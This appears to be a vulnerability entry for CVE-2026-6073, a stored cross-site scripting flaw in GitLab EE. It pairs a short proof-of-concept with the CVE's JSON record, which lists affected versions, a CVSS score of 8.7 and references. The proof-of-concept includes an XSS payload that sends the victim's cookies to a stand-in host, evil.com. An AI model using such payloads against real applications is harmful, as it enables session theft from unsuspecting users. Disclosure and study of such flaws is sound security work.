CVE-2026-6073

// PoC for CVE-2026-6073: Stored XSS in GitLab EE // Attacker injects payload into a vulnerable field (e.g., issue description, profile bio) const payload = '<img src=x onerror=alert(document.cookie)>'; // Scenario 1: Simple Alert // When a victim views the page containing this payload, the alert box pops up. // Scenario 2: Data Exfiltration const exfilPayload = '<script>fetch(\'https://evil.com/steal?c=\' + btoa(document.cookie))</script>'; // Note: This requires the attacker to have authenticated access to the application.

{"cve": {"id": "CVE-2026-6073", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:24.503", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to execute arbitrary JavaScript in other users' browsers due to improper input sanitization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/596340", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3655677", "source": "[email protected]"}]}}